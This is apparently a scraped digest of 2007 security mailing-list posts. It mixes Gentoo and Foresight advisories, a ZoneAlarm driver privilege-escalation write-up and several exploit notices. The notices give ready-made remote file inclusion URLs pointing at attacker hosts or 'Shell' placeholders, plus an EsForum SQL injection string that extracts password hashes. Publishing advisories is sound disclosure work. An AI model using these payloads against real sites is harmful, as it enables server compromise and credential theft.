http://creativecommons.org/licenses/by-sa/2.5 pgpSWCCk6l6KI.pgp Description: PGP signature
Allfaclassfieds (level2.php dir) remote file inclusion
Allfaclassfieds (level2.php dir) remote file inclusion -- Bug Found By Dr.RoVeR -->Arab48 Hacker Contact: [EMAIL PROTECTED] --- Script: allfaclassfieds Download: http://scriptat.com/download.php?sid=718 -- Bug File: level2.php Bug code in line 4: require("$dir/admin/dp.php"); -- Exploit: http://site.com/[path]/admin/setup/level2.php?dir=[EvilScript] -- ___ Get your free email from http://www.hackermail.com
EsForum <= 3.0 SQL Injection Vulnerability
--- AYYILDIZ.ORG PreSents... Script: EsForum v3.0 Script Download: http://www.editeurscripts.com/scripts/dl-esforum-3.html Contact: ilker Kandemir info: */ MEFISTO Begins. */ --- Exploit: forum.php?idsalon='/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,6/**/FROM/**/esforum_users%20where%20user_id=1/* --- Tnx:H0tturk,Dr.Max Virus,Gencnesil,CodeR,Ajann Special Tnx: AYYILDIZ.ORG
Big Blue Guestbook HTML Injection Vulnerabilities
Hi friends, Big Blue Guestbook software is prone to HTML injection attacks. This issue is exposed via the message form field in the guestbook entry submission form. Exploitation could permit remote attackers to persistently inject hostile HTML and script code into guestbook content. This could allow for theft of cookie-based authentications or other attacks, such as those which misrepresent guestbook content. vendor : http://www.ben-barnett.com/guestbook.php download : http://www.ben-barnett.com/BigBlueGuestbook.zip Thnx: www.starhack.org // CaRaMeL
WASC-Articles: 'The business case for security frameworks'
The Web Application Security Consortium is proud to present 'The business case for security frameworks' by Robert Auger. In this article Robert describes the advantages of using input validation frameworks during development to reduce risks such as Cross-site Scripting. This document can be found at http://www.webappsec.org/projects/articles/ . - articles_at_webappsec.org http://www.webappsec.org Are you interested in writing a 'Guest Article' for the WASC? Additional information on article guidelines may be found at http://www.webappsec.org/articles/. Inquires can be sent to articles_at_webappsec.org "Contributed articles may include industry best practices, technical information about current issues, innovative defense techniques, etc. NO VENDOR PITCHES OR MARKETING GIMMICKS PLEASE. We are only soliciting concrete information from the experts on the front lines of the web application security field." Join us on IRC: irc.freenode.net #webappsec
Re: WS_FTP Home 2007 NetscapeFTPHandler denial of service
Hey, It appears that WS_FTP Professional 2007 is also vulnerable as it takes advantage of NetscapeFTPHandler as well.
bibtex mase Remote File Inclusion
~~ bibtex mase Remote File Inclusion ~~ Affected Software .: bibtex mase beta 2.0 Download..: http://www.cs.kuleuven.ac.be/~raf/bibtex/downloads/bibtex_mase_beta_2.0.tgz Risk ..: high Found by ..: InyeXion Contact ...: InyeXion[at]gmail.com Web .: Www.InyeXion.com.ar ~~ Affected Files: /unavailable.php /Source.php /log.php /latex.php /indexinfo.php /index.php /importinfo.php /import.php /examplefile.php /clearinfo.php /clear.php /aboutinfo.php /about.php etc. Vulnerable Code: include($bibtexrootrel."/layout/header.inc"); ~~ Exploit: http://[target]/unavailable.php?bibtexrootrel=Shell? http://[target]/source.php?bibtexrootrel=Shell? http://[target]/log.php?bibtexrootrel=Shell? http://[target]/latex.php?bibtexrootrel=Shell? http://[target]/indexinfo.php?bibtexrootrel=Shell? http://[target]/index.php?bibtexrootrel=Shell? http://[target]/importinfo.php?bibtexrootrel=Shell? http://[target]/import.php?bibtexrootrel=Shell? http://[target]/examplefile.php?bibtexrootrel=Shell? http://[target]/clearinfo.php?bibtexrootrel=Shell? http://[target]/clear.php?bibtexrootrel=Shell? http://[target]/aboutinfo.php?bibtexrootrel=Shell? http://[target]/about.php?bibtexrootrel=Shell? ~~~ Fixed bug: if((isset($_REQUEST['bibtexrootrel']) || isset($_GET['bibtexrootrel']) || isset($_POST['bibtexrootrel'])) && !defined("bibtexrootrel")){ die("denied access"); } ~~
Remote file inclusion in Joomla 1.5.0 Beta
Hi, Joomla! 1.5.0 is in Beta version and "should NOT to be used for `live` or `production` sites." Joomla 1.0.12 has a good security but it seems that Joomla 1.5.0 doesnt have a good security approach. Anyway, there is a remote file inclusion in Joomla 1.5.0 Beta : File /libraries/pcl/pcltar.php, Line 74 : if (!defined("PCLERROR_LIB")) { include($g_pcltar_lib_dir."/pclerror.lib.".$g_pcltar_extension); } POC : http://hacked/libraries/pcl/pcltar.php?g_pcltar_lib_dir=http://hacker/? The original advisory (in Persian) is located at : http://www.hackers.ir/advisories/joomla.html - Omid
FLEA-2007-0013-1: xine-lib
Foresight Linux Essential Advisory: 2007-0013-1 Published: 2007-04-23 Rating: Moderate Updated Versions: xine-lib=/[EMAIL PROTECTED]:devel//[EMAIL PROTECTED]:1-devel//1/1.1.6-1.1-1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.2.1-0.2-2 References: https://issues.foresightlinux.org/browse/FL-266 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1246 Description: Previous versions of the xine-lib package were vulnerable to a buffer overflow which could be exploited to execute arbitrary code on the target machine. This can be exploited by a remote user only in a locally-assisted fashion - by enticing the user to open a specially crafted file.
[ GLSA 200704-18 ] Courier-IMAP: Remote execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200704-18 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Courier-IMAP: Remote execution of arbitrary code Date: April 22, 2007 Bugs: #168196 ID: 200704-18 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability has been discovered in Courier-IMAP allowing for remote code execution with root privileges. Background == Courier-IMAP is an IMAP server which is part of the Courier mail system. It provides access only to maildirs. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 net-mail/courier-imap < 4.0.6-r2 >= 4.0.6-r2 Description === CJ Kucera has discovered that some Courier-IMAP scripts don't properly handle the XMAILDIR variable, allowing for shell command injection. Impact == A remote attacker could send specially crafted login credentials to a Courier-IMAP server instance, possibly leading to remote code execution with root privileges. Workaround == There is no known workaround at this time. Resolution == All Courier-IMAP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-mail/courier-imap-4.0.6-r2" Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200704-18.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpBfmuZ8oOap.pgp Description: PGP signature
File117 Remote File Inclusion
~ File117 Remote File Inclusion ~ Affected Software .: File117 Download..: http://www.sinato.com/jmuffin/upload/file117.zip Risk ..: high Found by ..: InyeXion Contact ...: InyeXion[at]gmail.com Web .: Www.InyeXion.com.ar ~ Affected File: /html/php/detail.php Vulnerable Code: ~ Exploit: http://[target]/html/php/detail.php?relPath=[shell]? http://[target]/html/php/detail.php?folder=[shell]? ~ Fixed bug: if((isset($_REQUEST['relPath']) || isset($_GET['relPath']) || isset($_POST['relPath'])) && !defined("relPath")){ die("denied access"); } AND if((isset($_REQUEST['folder']) || isset($_GET['folder']) || isset($_POST['folder'])) && !defined("folder")){ die("denied access"); } ~
[ GLSA 200704-16 ] Aircrack-ng: Remote execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200704-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Aircrack-ng: Remote execution of arbitrary code Date: April 22, 2007 Bugs: #174340 ID: 200704-16 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Aircrack-ng contains a buffer overflow that could lead to the remote execution of arbitrary code with root privileges. Background == Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-wireless/aircrack-ng < 0.7-r2 >= 0.7-r2 Description === Jonathan So reported that the airodump-ng module does not correctly check the size of 802.11 authentication packets before copying them into a buffer. Impact == A remote attacker could trigger a stack-based buffer overflow by sending a specially crafted 802.11 authentication packet to a user running airodump-ng with the -w (--write) option. This could lead to the remote execution of arbitrary code with the permissions of the user running airodump-ng, which is typically the root user. Workaround == There is no known workaround at this time. Resolution == All Aircrack-ng users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-wireless/aircrack-ng-0.7-r2" References == [ 1 ] CVE-2007-2057 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2057 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200704-16.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpRXWzkabEEn.pgp Description: PGP signature
claroline <= Multiple Remote File Include Vulnerablitiy
# claroline <= Multiple Remote File Include Vulnerablitiy # D.Script: http://www.e-learningone.it/software_free/e-learning/claroline175.zip # Discovered by: MoHaNdKo-=-=-> [EMAIL PROTECTED] # Homepage: http://www.MoHaNdKo.cOm # Exploit:[Path]/claroline/inc/lib/rootSys=Shell # Greetz To: Tryag-Team & AsbMay's Group & Xp10 TeAm & CiTy GhOsTs TeAm #Greetz To: mY Love Dr.hacker BiG seso
lms 1.5.3 Remote File Inclusion
~~ lms 1.5.3 Remote File Inclusion ~~ Affected Software .: lms 1.5.3 libs Download..: http://www.lms.org.pl/download/1.5/ Risk ..: high Found by ..: InyeXion Contact ...: InyeXion[at]gmail.com Web .: Www.InyeXion.com.ar ~~ Affected File: /modules/rtmessageadd.php Vulnerable Code: Line 27 include($_LIB_DIR.'/multipart_mime_email.php'); ~~ Exploit: http://[target]/modules/rtmessageadd.php?_LIB_DIR=Shell? ~~~ Fixed bug: Update to last version ~~
[ GLSA 200704-17 ] 3proxy: Buffer overflow
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200704-17 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: 3proxy: Buffer overflow Date: April 22, 2007 Bugs: #174429 ID: 200704-17 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis A vulnerability has been discovered in 3proxy allowing for the remote execution of arbitrary code. Background == 3proxy is a multi-protocol proxy, including HTTP/HTTPS/FTP and SOCKS support. Affected packages = --- Package / Vulnerable / Unaffected --- 1 net-proxy/3proxy < 0.5.3h >= 0.5.3h Description === The 3proxy development team reported a buffer overflow in the logurl() function when processing overly long requests. Impact == A remote attacker could send a specially crafted transparent request to the proxy, resulting in the execution of arbitrary code with privileges of the user running 3proxy. Workaround == There is no known workaround at this time. Resolution == All 3proxy users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-proxy/3proxy-0.5.3h" References == [ 1 ] CVE-2007-2031 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2031 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200704-17.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpcOTFPOTuPS.pgp Description: PGP signature
PHPMyBibli <= Multiple Remote File Include
# PHPMyBibli <= Multiple Remote File Include Vulnerablitiy # D.Script: http://phpmybibli.sourceforge.net/PhpMyBibli-nightbuild.tar.gz # Discovered by: MoHaNdKo-=-=-> [EMAIL PROTECTED] # Homepage: http://www.MoHaNdKo.cOm # Exploit:[Path]/includes/init.inc.php?base_path=Shell # Greetz To: Tryag-Team & AsbMay's Group & Xp10 TeAm & CiTy GhOsTs TeAm #Greetz To: mY Love Dr.hacker BiG seso
[Reversemode advisory] CheckPoint Zonelabs - ZoneAlarm SRESCAN driver local privilege escalation
CHECK POINT ZONE LABS PRODUCTS MULTIPLE LOCAL PRIVILEGE ESCALATION VULNERABILITIES Rubén Santamarta <[EMAIL PROTECTED]> 04.20.2007 Affected products: + ZoneAlarm (Srescan.sys v 5.0.155 and earlier ) Srescan.sys is exposed through the following Dos Device:“\\.\SreScan”. Restricted accounts ,including guest users, can access privileged IOCTLs implemented within the driver affected. In addition to this potential risk factor, the driver does not validate user-mode buffers in Type3 , thus leading to local privilege escalation due to arbitrary Kernel memory overwrite. DosDevice: \\.\Srescan Driver: srescan.sysVersion: 5.0.83.0 - IOCTL 0x2220CF .text:00013127 mov ecx, [ebp+arg_10] .text:0001312A cmp dword ptr [ecx], 4 ; .text:0001312D jnz short loc_1313F .text:0001312F mov edx, [ebp+FileInformation] .text:00013132 mov dword ptr [edx], 3h ; edx controlled .text:00013138 xor esi, esi .text:0001313A mov [ebp+var_1C], esi .text:0001313D jmp short loc_1315F - IOCTL 0x22208F text:00014091 mov ebp, ds:ExAllocatePoolWithTag .text:00014097 mov esi, 2h .text:0001409C push31565244h ; Tag .text:000140A1 pushesi ; NumberOfBytes .text:000140A2 push0 ; PoolType .text:000140A4 callebp ; ExAllocatePoolWithTag .text:000140A6 mov ebx, eax .text:000140A8 testebx, ebx .text:000140AA jz short loc_140F3 .text:000140AC mov edi, ds:ZwQuerySystemInformation .text:000140B2 .text:000140B2 loc_140B2: ; CODE XREF: sub_14070+81#j .text:000140B2 lea ecx, [esp+1Ch+ReturnLength] .text:000140B6 pushecx ; ReturnLength .text:000140B7 pushesi ; SystemInformationLength .text:000140B8 pushebx ; SystemInformation .text:000140B9 push5 ; SystemInformationClass .text:000140BB calledi ; ZwQuerySystemInformation .text:000140BD cmp eax, 0C023h .text:000140C2 mov [esp+1Ch+var_4], eax .text:000140C6 jz short loc_140D6 .text:000140C8 cmp eax, 8005h .text:000140CD jz short loc_140D6 .text:000140CF cmp eax, 0C004h .text:000140D4 jnz short loc_14102 .text:0001411D loc_1411D: ; CODE XREF: sub_14070+112#j .text:0001411D mov eax, [edx+44h] .text:00014120 testeax, eax .text:00014122 jz short loc_1417A [...] .text:00014154 mov dword ptr [eax+4], 0 .text:0001415B mov esi, [edx+3Ch] .text:0001415E lea edi, [eax+0Ch]; edi = OutputBuffer. Controlled .text:00014161 mov eax, ecx .text:00014163 shr ecx, 2 .text:00014166 rep movsd .text:00014168 mov ecx, eax .text:0001416A mov eax, [esp+1Ch+var_8] .text:0001416E and ecx, 3 .text:00014171 inc eax .text:00014172 rep movsb .text:00014174 mov [esp+1Ch+var_8], eax .text:00014178 mov edi, eax Exploits No exploits are released. Ethical security companies can contact for requesting samples : contact (at) reversemode (dot) com [email concealed] References: www.zonelabs.com http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=517 http://www.reversemode.com/index.php?option=com_remository&Itemid=2&func=fileinfo&id=48 (PDF) --- Reversemode Advanced Reverse Engineering Services www.reversemode.com